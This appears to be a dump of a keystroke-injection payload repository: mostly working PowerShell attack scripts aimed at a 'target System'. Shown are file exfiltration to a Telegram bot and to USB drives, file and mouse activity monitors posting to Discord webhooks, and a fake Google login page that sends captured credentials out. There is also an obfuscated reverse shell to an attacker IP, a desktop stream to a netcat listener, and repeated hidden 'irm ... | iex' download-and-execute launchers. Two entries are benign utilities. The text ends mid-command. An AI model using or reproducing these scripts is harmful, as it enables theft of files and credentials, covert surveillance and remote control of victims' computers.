-------------------------------------------------------------------------------- 1 | 2 |

Exfiltrate Files to Telegram

3 | 4 | SYNOPSIS 5 | 6 | This script connects target computer with a telegram chat to upload certain files to telegram . 7 | 8 | SETUP INSTRUCTIONS 9 | 10 | 1. visit https://t.me/botfather and make a bot. 11 | 2. add bot api to script. 12 | 3. search for bot in top left box in telegram and start a chat then type /start. 13 | 4. Replace TELEGRAM_TOKEN with your token 14 | 5. Run Script on target System -------------------------------------------------------------------------------- /Fast-Execution/Exfiltrate-to-Telegram/main.ps1: -------------------------------------------------------------------------------- 1 | $Token = "$tg" 2 | $URL='https://api.telegram.org/bot{0}' -f $Token 3 | 4 | while($chatID.length -eq 0){ 5 | $updates = Invoke-RestMethod -Uri ($url + "/getUpdates") 6 | if ($updates.ok -eq $true) {$latestUpdate = $updates.result[-1] 7 | if ($latestUpdate.message -ne $null){$chatID = $latestUpdate.message.chat.id}} 8 | Sleep 10 9 | } 10 | 11 | Function Exfiltrate { 12 | 13 | param ([string[]]$FileType,[string[]]$Path) 14 | $maxZipFileSize = 50MB 15 | $currentZipSize = 0 16 | $index = 1 17 | $zipFilePath ="$env:temp/Loot$index.zip" 18 | $MessageToSend = New-Object psobject 19 | $MessageToSend | Add-Member -MemberType NoteProperty -Name 'chat_id' -Value $ChatID 20 | $MessageToSend | Add-Member -MemberType NoteProperty -Name 'text' -Value "$env:COMPUTERNAME : Exfiltration Started." -Force 21 | irm -Method Post -Uri ($URL +'/sendMessage') -Body ($MessageToSend | ConvertTo-Json) -ContentType "application/json" 22 | 23 | If($Path -ne $null){ 24 | $foldersToSearch = "$env:USERPROFILE\"+$Path 25 | }else{ 26 | $foldersToSearch = @("$env:USERPROFILE\Documents","$env:USERPROFILE\Desktop","$env:USERPROFILE\Downloads","$env:USERPROFILE\OneDrive","$env:USERPROFILE\Pictures","$env:USERPROFILE\Videos") 27 | } 28 | 29 | If($FileType -ne $null){ 30 | $fileExtensions = "*."+$FileType 31 | }else { 32 | $fileExtensions = @("*.log", "*.db", "*.txt", "*.doc", "*.pdf", "*.jpg", "*.jpeg", "*.png", "*.wdoc", "*.xdoc", "*.cer", "*.key", "*.xls", "*.xlsx", "*.cfg", "*.conf", "*.wpd", "*.rft") 33 | } 34 | 35 | Add-Type -AssemblyName System.IO.Compression.FileSystem 36 | $zipArchive = [System.IO.Compression.ZipFile]::Open($zipFilePath, 'Create') 37 | $escmsg = "Files from : "+$env:COMPUTERNAME 38 | 39 | foreach ($folder in $foldersToSearch) { 40 | foreach ($extension in $fileExtensions) { 41 | $files = Get-ChildItem -Path $folder -Filter $extension -File -Recurse 42 | foreach ($file in $files) { 43 | $fileSize = $file.Length 44 | if ($currentZipSize + $fileSize -gt $maxZipFileSize) { 45 | $zipArchive.Dispose() 46 | $currentZipSize = 0 47 | curl.exe -F chat_id="$ChatID" -F document=@"$zipFilePath" "https://api.telegram.org/bot$Token/sendDocument" 48 | Remove-Item -Path $zipFilePath -Force 49 | Sleep 1 50 | $index++ 51 | $zipFilePath ="$env:temp/Loot$index.zip" 52 | $zipArchive = [System.IO.Compression.ZipFile]::Open($zipFilePath, 'Create') 53 | } 54 | $entryName = $file.FullName.Substring($folder.Length + 1) 55 | [System.IO.Compression.ZipFileExtensions]::CreateEntryFromFile($zipArchive, $file.FullName, $entryName) 56 | $currentZipSize += $fileSize 57 | } 58 | } 59 | } 60 | $zipArchive.Dispose() 61 | curl.exe -F chat_id="$ChatID" -F document=@"$zipFilePath" "https://api.telegram.org/bot$Token/sendDocument" 62 | Remove-Item -Path $zipFilePath -Force 63 | Write-Output "$env:COMPUTERNAME : Exfiltration Complete." 64 | } 65 | 66 | 67 | # Define What you want to search for (examples at the top) 68 | Exfiltrate -Path documents -FileType log 69 | -------------------------------------------------------------------------------- /Fast-Execution/Exfiltrate-to-USB/Exfiltrate-to-USB.js: -------------------------------------------------------------------------------- 1 | // Title: beigeworm's Exfiltrate files USB Drive 2 | // Author: @beigeworm 3 | // Description: This script searches the users folder fot pictures, documents, logs, PDFs and more, then sends its all to newly connected USB drive. 4 | // Target: Windows 10 5 | 6 | // SETUP (optional) 7 | // Add your USB drive Name in quotes for $driveName 8 | // Add Y or N in quotes for $Hidden (hides console window) 9 | 10 | // script setup 11 | layout("us") 12 | 13 | // Open Powershell and download script 14 | delay(1000); 15 | press("GUI r"); 16 | delay(1000); 17 | type("powershell -NoP -Ep Bypass -C $driveName = ''; $Hidden = ''; irm https://raw.githubusercontent.com/beigeworm/PwnPi-Scripts/main/Fast-Execution/Exfiltrate-to-USB/main.ps1 | iex"); 18 | delay(500); 19 | press("ENTER"); 20 | -------------------------------------------------------------------------------- /Fast-Execution/Exfiltrate-to-USB/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Exfiltrate Files to USB

3 | 4 | SYNOPSIS 5 | 6 | Waits for a new USB Storage device to be connected and then copies many user files to that USB drive. 7 | 8 | USAGE 9 | 10 | 1. Run the script. 11 | 2. Choose if you want to hide the console window (silent mode) 12 | 3. Connect a USB Drive to the computer 13 | 4. Copying files will automatically begin to the newly connected drive 14 | 5. 'Completed' message will appear when finished (hidden mode only) 15 | 16 | -------------------------------------------------------------------------------- /Fast-Execution/Exfiltrate-to-USB/main.ps1: -------------------------------------------------------------------------------- 1 | [Console]::BackgroundColor = "Black" 2 | [Console]::SetWindowSize(57, 5) 3 | [Console]::Title = "Exfiltration" 4 | Clear-Host 5 | 6 | if($driveName.length -lt 1){ 7 | $driveName = Read-Host "Enter the name of the USB drive " 8 | } 9 | 10 | if($hidden.length -lt 1){ 11 | $hidden = Read-Host "Would you like to hide this console window? (Y/N) " 12 | } 13 | 14 | $i = 10 15 | 16 | While ($true){ 17 | cls 18 | Write-Host "Waiting for USB Drive.. ($i)" -ForegroundColor Yellow 19 | $drive = Get-WMIObject Win32_LogicalDisk | ? {$_.VolumeName -eq $driveName} | select DeviceID 20 | sleep 1 21 | if ($drive.length -ne 0){ 22 | Write-Host "USB Drive Connected!" -ForegroundColor Green 23 | break 24 | } 25 | $i-- 26 | if ($i -eq 0 ){ 27 | Write-Host "Timeout! Exiting" -ForegroundColor Red 28 | sleep 1 29 | exit 30 | } 31 | } 32 | 33 | [Console]::SetWindowSize(80, 30) 34 | 35 | $drive = Get-WMIObject Win32_LogicalDisk | ? {$_.VolumeName -eq $driveName} 36 | $driveletter = $drive.DeviceID 37 | Write-Host "Loot Drive Set To : $driveLetter/" -ForegroundColor Green 38 | $fileExtensions = @("*.log", "*.db", "*.txt", "*.doc", "*.pdf", "*.jpg", "*.jpeg", "*.png", "*.wdoc", "*.xdoc", "*.cer", "*.key", "*.xls", "*.xlsx", "*.cfg", "*.conf", "*.wpd", "*.rft") 39 | $foldersToSearch = @("$env:USERPROFILE\Documents","$env:USERPROFILE\Desktop","$env:USERPROFILE\Downloads","$env:USERPROFILE\OneDrive","$env:USERPROFILE\Pictures","$env:USERPROFILE\Videos") 40 | $destinationPath = "$driveLetter\$env:COMPUTERNAME-Loot" 41 | 42 | if (-not (Test-Path -Path $destinationPath)) { 43 | New-Item -ItemType Directory -Path $destinationPath -Force 44 | Write-Host "New Folder Created : $destinationPath" -ForegroundColor Green 45 | } 46 | 47 | If ($hidden -eq 'y'){ 48 | Write-Host "Hiding the Window.." -ForegroundColor Red 49 | sleep 1 50 | $Async = '[DllImport("user32.dll")] public static extern bool ShowWindowAsync(IntPtr hWnd, int nCmdShow);' 51 | $Type = Add-Type -MemberDefinition $Async -name Win32ShowWindowAsync -namespace Win32Functions -PassThru 52 | $hwnd = (Get-Process -PID $pid).MainWindowHandle 53 | if($hwnd -ne [System.IntPtr]::Zero){ 54 | $Type::ShowWindowAsync($hwnd, 0) 55 | } 56 | else{ 57 | $Host.UI.RawUI.WindowTitle = 'hideme' 58 | $Proc = (Get-Process | Where-Object { $_.MainWindowTitle -eq 'hideme' }) 59 | $hwnd = $Proc.MainWindowHandle 60 | $Type::ShowWindowAsync($hwnd, 0) 61 | } 62 | } 63 | 64 | foreach ($folder in $foldersToSearch) { 65 | Write-Host "Searching in $folder" -ForegroundColor Yellow 66 | 67 | foreach ($extension in $fileExtensions) { 68 | $files = Get-ChildItem -Path $folder -Recurse -Filter $extension -File 69 | 70 | foreach ($file in $files) { 71 | $destinationFile = Join-Path -Path $destinationPath -ChildPath $file.Name 72 | Write-Host "Copying $($file.FullName) to $($destinationFile)" -ForegroundColor Gray 73 | Copy-Item -Path $file.FullName -Destination $destinationFile -Force 74 | } 75 | } 76 | } 77 | If ($hidden -eq 'y'){ 78 | (New-Object -ComObject Wscript.Shell).Popup("File Exfiltration Complete",5,"Exfiltration",0x0) 79 | } 80 | else{ 81 | Write-Host "File Exfiltration Complete" -ForegroundColor Green 82 | } 83 | -------------------------------------------------------------------------------- /Fast-Execution/File-Monitor-to-Discord/File-Changes-to-Discord.js: -------------------------------------------------------------------------------- 1 | // Title: beigeworm's monitor file changes to Discord Webhook. 2 | // Author: @beigeworm 3 | // Description: This script monitors any file changes in the USERPROFILE directory and posts results to a discord webhook. 4 | // Target: Windows 10 5 | // *SETUP* 6 | // replace DISCORD_WEBHOOK_HERE with your Discord Webhook. 7 | 8 | // script setup 9 | layout("us") 10 | 11 | // Open Powershell and download script 12 | delay(1000); 13 | press("GUI r"); 14 | delay(1000); 15 | type("powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://is.gd/bw_fm_to_dc | iex"); 16 | delay(500); 17 | press("ENTER"); 18 | -------------------------------------------------------------------------------- /Fast-Execution/File-Monitor-to-Discord/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Filesystem Monitor to discord

3 | 4 | SYNOPSIS 5 | 6 | This script gathers information about any changes to any files in the "%USERPROFILE% folder". 7 | 8 | USAGE 9 | 2. Run Script on target System 10 | 3. Check temp folder for results 11 | -------------------------------------------------------------------------------- /Fast-Execution/File-Monitor-to-Discord/main.ps1: -------------------------------------------------------------------------------- 1 | $whuri = "$dc" 2 | 3 | $watcher = New-Object System.IO.FileSystemWatcher -Property @{ 4 | Path = $env:USERPROFILE + '\' 5 | } 6 | $watcher.NotifyFilter = [System.IO.NotifyFilters]::FileName -bor ` 7 | [System.IO.NotifyFilters]::LastWrite -bor ` 8 | [System.IO.NotifyFilters]::DirectoryName 9 | 10 | $action = { 11 | $event = $EventArgs 12 | $path = $event.FullPath 13 | $changeType = $event.ChangeType 14 | $timestamp = Get-Date -Format "yyyy-MM-dd HH:mm:ss" 15 | 16 | $msgsys = "[$timestamp] File $changeType > $path" 17 | $escmsgsys = $msgsys -replace '[&<>]', {$args[0].Value.Replace('&', '&').Replace('<', '<').Replace('>', '>')} 18 | $jsonsys = @{"username" = "$env:COMPUTERNAME" ;"content" = $escmsgsys} | ConvertTo-Json 19 | Invoke-RestMethod -Uri $whuri -Method Post -ContentType "application/json" -Body $jsonsys 20 | 21 | } 22 | 23 | Register-ObjectEvent -InputObject $watcher -EventName Created -Action $action 24 | Register-ObjectEvent -InputObject $watcher -EventName Deleted -Action $action 25 | Register-ObjectEvent -InputObject $watcher -EventName Changed -Action $action 26 | 27 | $watcher.EnableRaisingEvents = $true 28 | 29 | while ($true) { 30 | Start-Sleep -Milliseconds 500 31 | } 32 | 33 | Unregister-Event -InputObject $watcher -EventName Created -Action $action 34 | Unregister-Event -InputObject $watcher -EventName Deleted -Action $action 35 | Unregister-Event -InputObject $watcher -EventName Changed -Action $action 36 | -------------------------------------------------------------------------------- /Fast-Execution/Filetype-Organizer/Filetype-Organizer.js: -------------------------------------------------------------------------------- 1 | // Title: Filetype Organizer 2 | // Author: @beigeworm 3 | // Description: This script searches the users folder for any files with a specific filetype and copies them to the user folder. 4 | // Target: Windows 10 5 | 6 | // script setup 7 | layout("us") 8 | 9 | // Open Powershell and download script 10 | delay(1000); 11 | press("GUI r"); 12 | delay(1000); 13 | type("powershell -NoP -Ep Bypass -W H -C cd $env:USERPROFILE; irm https://raw.githubusercontent.com/beigeworm/PwnPi-Scripts/main/Fast-Execution/Filetype-Organizer/main.ps1 | iex"); 14 | delay(500); 15 | press("ENTER"); 16 | -------------------------------------------------------------------------------- /Fast-Execution/Filetype-Organizer/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Search Folders For Filetypes

3 | 4 | SYNOPSIS 5 | 6 | Searches User folder for any files with specific filetype and copies them. 7 | 8 | USAGE 9 | 10 | 1. Run Script. 11 | 2. follow instructions in the console. -------------------------------------------------------------------------------- /Fast-Execution/Filetype-Organizer/main.ps1: -------------------------------------------------------------------------------- 1 | 2 | $Host.UI.RawUI.BackgroundColor = "Black" 3 | Clear-Host 4 | $width = 88 5 | $height = 30 6 | [Console]::SetWindowSize($width, $height) 7 | $windowTitle = " BeigeTools | Filetype Organizer" 8 | [Console]::Title = $windowTitle 9 | Write-Host "=======================================================================================" -ForegroundColor Green 10 | Write-Host "============================= BeigeTools | Filetype Organizer =================================" -ForegroundColor Green 11 | Write-Host "=======================================================================================`n" -ForegroundColor Green 12 | Write-Host "More info at : https://github.com/beigeworm" -ForegroundColor DarkGray 13 | Write-Host "Starts a GUI window to select a folder, then search for every file with a selected filetype and output to respective named files in the root folder.`n" 14 | 15 | # Get the directory of the script 16 | $scriptDirectory = Split-Path -Parent $MyInvocation.MyCommand.Definition 17 | 18 | # Prompt user for file extensions 19 | $fileExtensions = Read-Host "Enter file extensions separated by commas (e.g., jpg,mp4,png)" 20 | 21 | # Convert the input into an array 22 | $fileExtensionsArray = $fileExtensions -split ',' 23 | 24 | # Prompt user for folder to search recursively 25 | $folderPath = Read-Host "Enter the folder path to search recursively" 26 | 27 | # Prompt user to choose between move or copy 28 | $operation = Read-Host "Enter 'M' to move files, 'C' to copy files" 29 | 30 | # Validate the user input for the operation 31 | if ($operation -ne 'M' -and $operation -ne 'C') { 32 | Write-Host "Invalid operation. Please enter 'M' for move or 'C' for copy." 33 | exit 34 | } 35 | 36 | # Create output folders in the script directory 37 | foreach ($extension in $fileExtensionsArray) { 38 | $folderName = $extension.Trim() 39 | $folderPathForExtension = Join-Path $scriptDirectory $folderName 40 | New-Item -ItemType Directory -Path $folderPathForExtension -Force 41 | } 42 | 43 | # Search for files and move/copy to appropriate folders 44 | foreach ($extension in $fileExtensionsArray) { 45 | $files = Get-ChildItem -Path $folderPath -Recurse -Include "*.$extension" 46 | 47 | foreach ($file in $files) { 48 | $destinationFolder = Join-Path $scriptDirectory $extension.Trim() 49 | 50 | if ($operation -eq 'M') { 51 | $ind = $file.FullName 52 | Move-Item $file.FullName -Destination $destinationFolder -Force 53 | Write-Host "Moved : $ind" 54 | 55 | } elseif ($operation -eq 'C') { 56 | $ind = $file.FullName 57 | Copy-Item $file.FullName -Destination $destinationFolder -Force 58 | Write-Host "Copied : $ind" 59 | } 60 | } 61 | } 62 | 63 | Write-Host "Operation Complete." -ForegroundColor Green 64 | pause -------------------------------------------------------------------------------- /Fast-Execution/GIF-Player/Gif-Player.js: -------------------------------------------------------------------------------- 1 | // Title: beigeworm's GIF Player. 2 | // Author: @beigeworm 3 | // Description: This script changes downlaods a rick and morty GIF and plays it in a GUI window. 4 | // Target: Windows 10 5 | 6 | // script setup 7 | layout("us") 8 | 9 | // Open Powershell and download script 10 | delay(1000); 11 | press("GUI r"); 12 | delay(1000); 13 | type("powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigeworm/PwnPi-Scripts/main/Fast-Execution/GIF-Player/main.ps1 | iex"); 14 | delay(500); 15 | press("ENTER"); -------------------------------------------------------------------------------- /Fast-Execution/GIF-Player/README.md: -------------------------------------------------------------------------------- 1 | 2 |

GIF Player in Powershell

3 | 4 | SYNOPSIS 5 | 6 | This Script downloads a GIF from Giphy and plays it in a GUI window. 7 | 8 | USAGE 9 | 10 | 1. Run this script in powershell 11 | -------------------------------------------------------------------------------- /Fast-Execution/GIF-Player/main.ps1: -------------------------------------------------------------------------------- 1 | Add-Type -AssemblyName System.Windows.Forms 2 | Add-Type -AssemblyName System.Drawing 3 | [System.Windows.Forms.Application]::EnableVisualStyles() 4 | 5 | $url = "https://media3.giphy.com/media/tJqyalvo9ahykfykAj/giphy.gif?ep=v1_gifs_search" # example GIF (replace with your own link) 6 | $gifPath = "$env:temp/g.gif" 7 | iwr -Uri $url -OutFile $gifPath 8 | $ErrorActionPreference = 'Stop' 9 | 10 | function Play-Gif { 11 | param( 12 | [string]$GifPath 13 | ) 14 | 15 | $form = New-Object System.Windows.Forms.Form 16 | $pictureBox = New-Object System.Windows.Forms.PictureBox 17 | $timer = New-Object System.Windows.Forms.Timer 18 | 19 | $form.Text = "GIF Player" 20 | $form.Size = New-Object System.Drawing.Size(490, 300) 21 | $form.StartPosition = 'CenterScreen' 22 | $form.Topmost = $true 23 | 24 | $pictureBox.Size = $form.Size 25 | $pictureBox.Image = [System.Drawing.Image]::FromFile($GifPath) 26 | 27 | $timer.Interval = 50 # Adjust the interval as needed for desired animation speed 28 | $timer.Add_Tick({ 29 | $pictureBox.Image.SelectActiveFrame([System.Drawing.Imaging.FrameDimension]::Time, $timer.Tag) 30 | $pictureBox.Refresh() 31 | $timer.Tag = ($timer.Tag + 1) % $pictureBox.Image.GetFrameCount([System.Drawing.Imaging.FrameDimension]::Time) 32 | }) 33 | 34 | $timer.Tag = 0 35 | 36 | $form.Controls.Add($pictureBox) 37 | 38 | $form.Add_Shown({ $timer.Start() }) 39 | 40 | $form.ShowDialog() 41 | } 42 | 43 | Play-Gif -GifPath $gifPath 44 | sleep 1 45 | Remove-Item $gifPath 46 | -------------------------------------------------------------------------------- /Fast-Execution/Google-Phishing/Google-Phish-to-Discord.js: -------------------------------------------------------------------------------- 1 | // Title: beigeworm's Fake Google Phishing page to Discord Webhook. 2 | // Author: @beigeworm 3 | // Description: This script makes a Fake Google Phishing page and posts results to a discord webhook. 4 | // Target: Windows 10 5 | // *SETUP* 6 | // replace DISCORD_WEBHOOK_HERE with your Discord Webhook. 7 | 8 | // script setup 9 | layout("us") 10 | 11 | // Open Powershell and download script 12 | delay(1000); 13 | press("GUI r"); 14 | delay(1000); 15 | type("powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://is.gd/bw_gp_to_dc | iex"); 16 | delay(500); 17 | press("ENTER"); 18 | -------------------------------------------------------------------------------- /Fast-Execution/Google-Phishing/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Google Sign in to Discord

3 | 4 | SYNOPSIS 5 | 6 | Uses Powershell and HTML to create a fake google login page which catches login credentials and sends them to a webhook. 7 | 8 | USAGE 9 | 10 | 1. Replace YOUR_WEBBHOOK_HERE with your webhook 11 | 2. Run script on target system. 12 | -------------------------------------------------------------------------------- /Fast-Execution/LAN-Tools/LAN-Tools.js: -------------------------------------------------------------------------------- 1 | // Title: beigeworm's LAN Tools 2 | // Author: @beigeworm 3 | // Description: Start up a HTTP server and run a selection of Local Area Network Tools using Powershell. 4 | // NOTE - This script will need Admin privileges to run properly. 5 | 6 | // script setup 7 | layout("us") 8 | 9 | // Open Powershell and download script 10 | delay(1000); 11 | press("GUI r"); 12 | delay(1000); 13 | type("powershell -NoP -Ep Bypass -C irm https://raw.githubusercontent.com/beigeworm/Posh-LAN/main/Posh-LAN-Tools.ps1 | iex"); 14 | delay(500); 15 | press("ENTER"); -------------------------------------------------------------------------------- /Fast-Execution/LAN-Tools/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Beigeworm's Powershell LAN Toolset

3 | 4 | MAIN SCRIPT HERE - https://github.com/beigeworm/Posh-LAN 5 | 6 | SYNOPSIS 7 | 8 | Start up a HTTP server and run a selection of Local Area Network Tools using Powershell. 9 | 10 | USAGE 11 | 12 | 1. Run this script on target computer and note the URL provided 13 | 2. on another device on the same network, enter the provided URL in a browser window 14 | 15 | NOTE 16 | 17 | This script will need Admin privaleges to run properly. 18 | -------------------------------------------------------------------------------- /Fast-Execution/Mouse-Monitor-to-Discord/Mouse-Activity-to-Discord.js: -------------------------------------------------------------------------------- 1 | // Title: beigeworm's monitor mouse activity to Discord Webhook. 2 | // Author: @beigeworm 3 | // Description: This script monitors mouse activity and posts results to a discord webhook. 4 | // Target: Windows 10 5 | // *SETUP* 6 | // replace DISCORD_WEBHOOK_HERE with your Discord Webhook. 7 | 8 | // script setup 9 | layout("us") 10 | 11 | // Open Powershell and download script 12 | delay(1000); 13 | press("GUI r"); 14 | delay(1000); 15 | type("powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://is.gd/bw_mm_to_dc | iex"); 16 | delay(500); 17 | press("ENTER"); 18 | -------------------------------------------------------------------------------- /Fast-Execution/Mouse-Monitor-to-Discord/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Mouse Monitor to Discord

3 | 4 | SYNOPSIS 5 | 6 | This script gathers information about any mouse movement and idletime and sends info to Discord". 7 | 8 | USAGE 9 | 10 | 2. Run Script on target System 11 | 3. Check Discord for results 12 | -------------------------------------------------------------------------------- /Fast-Execution/Mouse-Monitor-to-Discord/main.ps1: -------------------------------------------------------------------------------- 1 | $whuri = "$dc" 2 | 3 | $signature = @' 4 | [DllImport("user32.dll")] 5 | [return: MarshalAs(UnmanagedType.Bool)] 6 | public static extern bool GetCursorPos(out POINT lpPoint); 7 | [StructLayout(LayoutKind.Sequential)] 8 | public struct POINT 9 | { 10 | public int X; 11 | public int Y; 12 | } 13 | '@ 14 | 15 | $timestamp = Get-Date -Format "yyyy-MM-dd HH:mm:ss" 16 | $outpath = "$env:temp\info.txt" 17 | $cursorType = Add-Type -MemberDefinition $signature -Name "CursorPos" -Namespace "Win32" -PassThru 18 | $prevX = 0 19 | $idleThreshold = New-TimeSpan -Seconds 60 20 | $lastActivityTime = [System.DateTime]::Now 21 | $isActive = $true 22 | $iActive = $true 23 | sleep 1 24 | 25 | while ($true) { 26 | $cursorPos = New-Object Win32.CursorPos+POINT 27 | [Win32.CursorPos]::GetCursorPos([ref]$cursorPos) | Out-Null 28 | $currentX = $cursorPos.X 29 | $currentTime = [System.DateTime]::Now 30 | 31 | if ($currentX -ne $prevX) { 32 | if ($iActive) { 33 | $prevX = $currentX 34 | $lastActivityTime = $currentTime 35 | 36 | if ($idleTime -lt $idleThreshold) { 37 | $msgsys = "[$timestamp] : Mouse is active" 38 | $escmsgsys = $msgsys -replace '[&<>]', {$args[0].Value.Replace('&', '&').Replace('<', '<').Replace('>', '>')} 39 | $jsonsys = @{"username" = "$env:COMPUTERNAME" ;"content" = $escmsgsys} | ConvertTo-Json 40 | Invoke-RestMethod -Uri $whuri -Method Post -ContentType "application/json" -Body $jsonsys 41 | } 42 | $iActive = $false 43 | } 44 | } 45 | else { 46 | $iActive = $true 47 | } 48 | 49 | 50 | $idleTime = $currentTime - $lastActivityTime 51 | 52 | if ($idleTime -ge $idleThreshold) { 53 | if ($isActive) { 54 | $msgsys = "[$timestamp] : Mouse has been inactive for 60 seconds" 55 | $escmsgsys = $msgsys -replace '[&<>]', {$args[0].Value.Replace('&', '&').Replace('<', '<').Replace('>', '>')} 56 | $jsonsys = @{"username" = "$env:COMPUTERNAME" ;"content" = $escmsgsys} | ConvertTo-Json 57 | Invoke-RestMethod -Uri $whuri -Method Post -ContentType "application/json" -Body $jsonsys 58 | $isActive = $false 59 | $iActive = $true 60 | } 61 | else { 62 | } 63 | } 64 | else { 65 | $isActive = $true 66 | } 67 | Start-Sleep -Milliseconds 60 68 | } 69 | 70 | -------------------------------------------------------------------------------- /Fast-Execution/Netcat-Client/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Simple Netcat Client

3 | 4 | SYNOPSIS 5 | 6 | Opens a netcat connection to a Windows machine in Powershell 7 | 8 | USAGE 9 | 10 | 1. Download Ncat For windows. https://nmap.org/download#windows 11 | 2. Change "YOUR IP HERE" to the attacker machine's ipv4 address (find using ipconfig on windows) 12 | 3. Open a terminal on the attacker machine and type "nc -lvp 4444" 13 | 4. Run this script on the client machine. 14 | 15 | NOTE 16 | 17 | The PORT number is 4444 -------------------------------------------------------------------------------- /Fast-Execution/Netcat-Client/Simple-Netcat-Client.js: -------------------------------------------------------------------------------- 1 | // Title: Beigeworm's Simple Netcat Client 2 | // Author: @beigeworm 3 | // Description: This script connects target computer with a netcat session to send powershell commands. 4 | // Target: Windows 10 5 | // *SETUP* 6 | // replace IP_HERE with your netcat attacker IP Address. 7 | // NOTE The PORT number is 4444 8 | 9 | // script setup 10 | layout("us") 11 | 12 | // Open Powershell and download script 13 | delay(1000); 14 | press("GUI r"); 15 | delay(1000); 16 | type("powershell -NoP -Ep Bypass -W H -C $ip='IP_HERE'; irm https://raw.githubusercontent.com/beigeworm/PwnPi-Scripts/main/Fast-Execution/Netcat-Client/main.ps1 | iex"); 17 | delay(500); 18 | press("ENTER"); -------------------------------------------------------------------------------- /Fast-Execution/Netcat-Client/main.ps1: -------------------------------------------------------------------------------- 1 |  2 | do{ 3 | $v = 4 4 | $a = New-Object S`ySt`em.N`eT.`s`ock`eTs.TC`PC`li`eNt("$ip",4444) 5 | $b = $a.GetStream();[byte[]]$c = 0..65535|%{0} 6 | while(($d = $b.Read($c, 0, $c.Length)) -ne 0){ 7 | $e = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($c,0, $d) 8 | $f = (iex $e 2>&1 | Out-String );$g = $f + (pwd).Path + '> ' 9 | $h = ([text.encoding]::ASCII).GetBytes($g) 10 | $b.Write($h,0,$h.Length) 11 | $b.Flush()} 12 | $a.Close() 13 | Sleep 10 14 | }while ($v -le 5) 15 | -------------------------------------------------------------------------------- /Fast-Execution/Netcat-Screenshare/Desktop Screenshare over Netcat.js: -------------------------------------------------------------------------------- 1 | // Title: Beigeworm's Screenshare Through Netcat 2 | // Author: @beigeworm 3 | // Description: This script connects target computer with a netcat session to send a stream of the desktop to a browser window. 4 | // Target: Windows 10 5 | // *SETUP* 6 | // replace YOUR_IP_HERE with your netcat attacker IP Address. 7 | // Run script on target Windows system. 8 | // On a Linux box use this command > nc -lvnp 9000 | nc -lvnp 8080 (Netcat is required) 9 | // Then in a firefox browser on the Linux box > http://localhost:8080 10 | 11 | // script setup 12 | layout("us") 13 | 14 | // Open Powershell and download script 15 | delay(1000); 16 | press("GUI r"); 17 | delay(1000); 18 | type("powershell -NoP -Ep Bypass -W H -C $ip='YOUR_IP_HERE'; irm https://raw.githubusercontent.com/beigeworm/PwnPi-Scripts/main/Fast-Execution/Netcat-Screenshare/main.ps1 | iex"); 19 | delay(500); 20 | press("ENTER"); -------------------------------------------------------------------------------- /Fast-Execution/Netcat-Screenshare/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Desktop Screensahre Over Netcat

3 | 4 | SYNOPSIS 5 | 6 | Starts a video stream of the desktop to a netcat session (the output is viewed in a browser.) 7 | 8 | USAGE 9 | 10 | Run script on target Windows system. 11 | On a Linux box use this command > nc -lvnp 9000 | nc -lvnp 8080 12 | Then in a firefox browser goto > http://localhost:8080 13 | 14 | (Firefox is the only browser that supports the codec for the video stream..) -------------------------------------------------------------------------------- /Fast-Execution/Netcat-Screenshare/main.ps1: -------------------------------------------------------------------------------- 1 | $IP = "$ip" 2 | $PORT = "9000" 3 | 4 | while ($true){ 5 | try{ 6 | Add-Type -AssemblyName System.Windows.Forms 7 | [System.IO.MemoryStream] $MemoryStream = New-Object System.IO.MemoryStream 8 | $socket = New-Object System.Net.Sockets.Socket ([System.Net.Sockets.AddressFamily]::InterNetwork, [System.Net.Sockets.SocketType]::Stream, [System.Net.Sockets.ProtocolType]::Tcp) 9 | $socket.Connect($IP,$PORT) 10 | 11 | function SendResponse($sock, $string){ 12 | if ($sock.Connected){ 13 | $bytesSent = $sock.Send($string) 14 | if ( $bytesSent -eq -1 ){}}} 15 | 16 | function SendStrResponse($sock, $string){ 17 | if ($sock.Connected){ 18 | $bytesSent = $sock.Send( 19 | [text.Encoding]::Ascii.GetBytes($string)) 20 | if ( $bytesSent -eq -1 ){}}} 21 | 22 | function SendHeader([net.sockets.socket] $sock,$length,$statusCode = "200 OK",$mimeHeader="text/html",$httpVersion="HTTP/1.1"){ 23 | $response = "HTTP/1.1 $statusCode`r`n" + "Content-Type: multipart/x-mixed-replace; boundary=--boundary`r`n`n" 24 | SendStrResponse $sock $response} 25 | SendHeader $socket 26 | 27 | while ($True){ 28 | $b = New-Object System.Drawing.Bitmap([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width, [System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height) 29 | $g = [System.Drawing.Graphics]::FromImage($b) 30 | $g.CopyFromScreen((New-Object System.Drawing.Point(0,0)), (New-Object System.Drawing.Point(0,0)), $b.Size) 31 | $g.Dispose() 32 | $MemoryStream.SetLength(0) 33 | $b.Save($MemoryStream, ([system.drawing.imaging.imageformat]::jpeg)) 34 | $b.Dispose() 35 | $length = $MemoryStream.Length 36 | [byte[]] $Bytes = $MemoryStream.ToArray() 37 | $str = "`n`n--boundary`n" + 38 | "Content-Type: image/jpeg`n" + 39 | "Content-Length: $length`n`n" 40 | SendStrResponse $socket $str 41 | SendResponse $socket $Bytes 42 | } 43 | $MemoryStream.Close() 44 | }catch{Write-Error $_}} 45 | 46 | -------------------------------------------------------------------------------- /Fast-Execution/Network-Enumeration-GUI/Network-Enumeration-GUI.js: -------------------------------------------------------------------------------- 1 | // Title: beigeworm's LAN Device Enumeration GUI Tool. 2 | // Author: @beigeworm 3 | // Description: This script creates a GUI for enumerating devices on the local network. 4 | // Target: Windows 10 5 | 6 | // script setup 7 | layout("us") 8 | 9 | // Open Powershell and download script 10 | delay(1000); 11 | press("GUI r"); 12 | delay(1000); 13 | type("powershell -NoP -Ep Bypass -W H -C irm 